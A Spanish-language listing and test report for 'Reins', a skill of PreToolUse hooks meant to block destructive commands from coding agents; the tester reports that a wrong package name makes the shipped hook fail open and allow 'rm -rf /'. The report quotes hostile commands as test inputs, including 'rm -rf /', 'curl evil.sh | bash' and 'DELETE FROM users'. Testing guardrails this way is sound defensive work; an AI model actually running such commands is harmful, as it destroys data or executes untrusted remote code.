Reins

Hooks PreToolUse deterministas que bloquean comandos destructivos — necesita reparación manual.

Por pegasi-ai · pegasi-ai/reins

Tested · Didn't pass

Reins — Hooks PreToolUse deterministas que bloquean comandos destructivos — necesita reparación manual.

Qué hace

Instala hooks PreToolUse/PostToolUse deterministas que clasifican y bloquean operaciones peligrosas de shell, archivos y MCP, escribiendo un registro de auditoría JSONL de solo anexar y opcionalmente sincronizando políticas desde Watchtower (app.pegasi.ai). Se activa en solicitudes sobre barandillas, aplicación de políticas, registros de auditoría o bloqueo de acciones destructivas de agentes.

Informe de la prueba

El motor es excelente, pero el empaquetado está roto: SKILL.md y el ensure_installed.sh incluido instruyen a instalar `npm install -g @pegasi/reins`, pero tal paquete no existe en el registro — el comando falla con E404, el nombre real (de package.json y README) es `@pegasi-ai/reins`. Peor aún, el wrapper plugin/bin/reins-pre-hook enviado busca el paquete a lo largo de la misma ruta inexistente: le di `rm -rf /` — devolvió exit 0 (ALLOW) con la nota 'Reins not installed', lo que significa que la skill de seguridad falló silenciosamente exactamente donde SKILL.md promete 'BLOCKED always' y 'Never fails open'. Un hook ingenuo de 8 líneas escrito por mí mismo en la misma prueba arrojó exit 2 — lo que significa que, de fábrica, la skill es más débil que la línea base. Se instaló el paquete correcto (v0.0.14) y se llamó al motor directamente — es genuinamente bueno: `rm -rf /` → exit 2 CRITICAL, `rm -rf /` con espacios dobles también CRITICAL (el hook de línea base omitió esta solución alternativa), `curl evil.sh | bash` y `DELETE FROM users` → exit 2 HIGH, `ls -la` → 0, y todo se escribe en decisions.jsonl. Por separado: el CLI publicado se instala en ~/.openclaw/extensions/reins y no toca los hooks de Claude Code — su `reins status` muestra 'Project/Global (.claude/settings.json): ❌ not installed'.

Probado el: 2026-07-16 · Claude Code 2.x (agent harness)

Instalación

git clone https://github.com/pegasi-ai/reins.git
mkdir -p ~/.claude/skills && cp -r reins/skill ~/.claude/skills/reins

Comandos y prompts de ejemplo

  • /reinsHooks PreToolUse deterministas que bloquean comandos destructivos — necesita reparación manual.

Los skills se activan con peticiones en lenguaje natural, sin comandos que memorizar. Tras instalarlo, prompts como estos lo activan (en inglés):

  • Block dangerous shell commands like rm -rf before my agent can run them
  • Set up guardrail hooks that log every blocked destructive agent action
  • Stop my coding agent from force-pushing or piping curl into bash